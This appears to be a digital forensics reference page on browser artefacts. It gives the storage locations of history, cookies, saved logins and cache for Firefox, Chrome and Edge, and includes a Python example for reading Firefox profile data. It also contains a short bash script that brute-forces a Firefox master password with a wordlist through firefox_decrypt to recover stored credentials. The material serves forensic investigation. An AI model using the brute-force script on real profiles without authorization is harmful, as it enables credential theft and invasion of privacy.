Artifacts

Browsers Artefacts

Browser artefacts include navigation history, bookmarks, the list of downloaded files, cache data, etc.

These artefacts are files stored inside of specific folders in the operating system.

Each browser stores its files in a different location and under different names, but most of the time they all store the same types of data (artefacts).

Let us take a look at the most common artefacts stored by browsers.

  • Navigation History : Contains data about the navigation history of the user. Can be used, for example, to check whether the user has visited malicious sites.
  • Autocomplete Data : This is the data that the browser suggests based on what you search the most. Can be used in tandem with the navigation history to get more insight.
  • Bookmarks : Self Explanatory.
  • Extensions and Addons : Self Explanatory.
  • Cache : When navigating websites, the browser creates all sorts of cache data (images, JavaScript files, etc.) for many reasons, for example to speed up the loading time of websites. These cache files can be a great source of data during a forensic investigation.
  • Logins : Self Explanatory.
  • Favicons : They are the little icons found in tabs, URLs, bookmarks and the like. They can be used as another source of information about the websites or places the user visited.
  • Browser Sessions : Self Explanatory.
  • Downloads : Self Explanatory.
  • Form Data : Anything typed inside forms is often stored by the browser, so the next time the user enters something inside a form the browser can suggest previously entered data.
  • Thumbnails : Self Explanatory.

Firefox

Firefox usually creates the profiles folder in ~/.mozilla/firefox/ (Linux) or in **C:\Users\XXX\AppData\Roaming\Mozilla\Firefox\Profiles** (Windows).
Inside this folder, the file _**profiles.ini**_ should appear with the name(s) of the used profile(s).
Each profile has a "**Path**" variable with the name of the folder where its data is going to be stored. The folder should be **present in the same directory where** _**profiles.ini**_ **exists**. If it isn't, then it was probably deleted.

Inside the folder of each profile (~/.mozilla/firefox/<ProfileName>/) you should be able to find the following interesting files:

  • places.sqlite : History (moz_places) and bookmarks (moz_bookmarks)
  • bookmarkbackups/ : Bookmarks backups
  • formhistory.sqlite : Web form data (like emails)
  • handlers.json : Protocol handlers (like, which app is going to handle mailto:// protocol)
  • persdict.dat : Words added to the dictionary
  • addons.json and extensions.sqlite : Installed addons and extensions
  • cookies.sqlite : Contains cookies
  • cache2/entries or startupCache : Cache data
  • favicons.sqlite : Favicons
  • prefs.js : Settings and Preferences
  • downloads.sqlite : Downloads
  • thumbnails/ : Thumbnails
  • logins.json : Encrypted usernames and passwords
  • key4.db or key3.db : Master key ?
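The profile lookup described above, as an added example that is not part of the original page: it reads profiles.ini, flags any profile whose folder is missing, and pulls history rows from moz_places in places.sqlite opened read-only. The function names, the sample profile names and the sample URL are constructed for illustration; `IsRelative` and the `moz_places` columns used here are the ones Firefox writes.

```python
import configparser, sqlite3, tempfile
from datetime import datetime, timezone
from pathlib import Path

def list_profiles(ff_root):
    """Return [(name, folder, exists)] for every [Profile*] section of profiles.ini."""
    ini = configparser.ConfigParser(interpolation=None)
    ini.read(Path(ff_root) / "profiles.ini", encoding="utf-8")
    out = []
    for sec in ini.sections():
        if not sec.startswith("Profile"):   # skip [General], [Install...] sections
            continue
        rel = ini.get(sec, "Path")
        # IsRelative=1 means Path is relative to the folder holding profiles.ini
        relative = ini.get(sec, "IsRelative", fallback="1") == "1"
        folder = (Path(ff_root) / rel) if relative else Path(rel)
        out.append((ini.get(sec, "Name", fallback=sec), folder, folder.is_dir()))
    return out

def read_history(profile_dir):
    """Return [(url, visit_count, last_visit_utc_iso)] from moz_places, opened read-only."""
    uri = (Path(profile_dir) / "places.sqlite").resolve().as_uri() + "?mode=ro"
    con = sqlite3.connect(uri, uri=True)
    try:
        rows = con.execute("SELECT url, visit_count, last_visit_date FROM moz_places "
                           "WHERE last_visit_date IS NOT NULL ORDER BY last_visit_date").fetchall()
    finally:
        con.close()
    # last_visit_date is stored as microseconds since the Unix epoch (UTC)
    return [(u, c, datetime.fromtimestamp(t / 1_000_000, tz=timezone.utc).isoformat())
            for u, c, t in rows]

def build_sample(root):
    """Constructed sample data: one present profile with history, one whose folder is gone."""
    root = Path(root)
    (root / "profiles.ini").write_text(
        "[Profile0]\nName=default\nIsRelative=1\nPath=abcd1234.default\n\n"
        "[Profile1]\nName=old\nIsRelative=1\nPath=zzzz9999.old\n")
    prof = root / "abcd1234.default"
    prof.mkdir()
    con = sqlite3.connect(prof / "places.sqlite")
    con.execute("CREATE TABLE moz_places (url TEXT, visit_count INTEGER, last_visit_date INTEGER)")
    con.execute("INSERT INTO moz_places VALUES ('https://example.com/', 3, 1700000000000000)")
    con.commit()
    con.close()
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for name, folder, present in list_profiles(build_sample(tmp)):
            print(name, folder.name, read_history(folder) if present else "MISSING (deleted?)")
```

Run it against a working copy of the profile rather than the original evidence; a profile copied from a live system may also carry a places.sqlite-wal file holding recent writes.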

In order to try to decrypt the master password you can use https://github.com/unode/firefox_decrypt
With the following script and call you can specify a password file to bruteforce:

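{% code title="brute.sh" %}

```bash
#!/bin/bash

# Usage: ./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:"
passfile="$1"
# IFS= and -r keep leading/trailing spaces and backslashes in each candidate intact
while IFS= read -r pass; do
  echo "Trying $pass"
  # firefox_decrypt.py reads the master password from stdin
  echo "$pass" | python firefox_decrypt.py
done < "$passfile"
```

{% endcode %}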

Google Chrome

Google Chrome creates the profile inside the home of the user ~/.config/google-chrome/ (Linux) or in **C:\Users\XXX\AppData\Local\Google\Chrome\User Data** (Windows).
Most of the information will be saved in the Default/ or ChromeDefaultData/ folders inside the paths indicated above. There you can find the following interesting files:

  • History : URLs, downloads and even searched keywords
  • Cookies : Cookies
  • Cache : Cache
  • Bookmarks : Bookmarks
  • Web Data : Form History
  • Favicons : Favicons
  • Login Data : Login information (usernames, passwords…)
  • Current Session and Current Tabs : Current session data and current tabs
  • Last Session and Last Tabs : Old session and tabs
  • Extensions/ : Extensions and addons folder
  • Thumbnails : Thumbnails

Microsoft Edge

  • Profile Path: C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC
  • History, Cookies and Downloads: C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
  • Settings, Bookmarks, and Reading List: C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb
  • Cache: C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\#!XXX\MicrosoftEdge\Cache
  • Last active sessions: C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active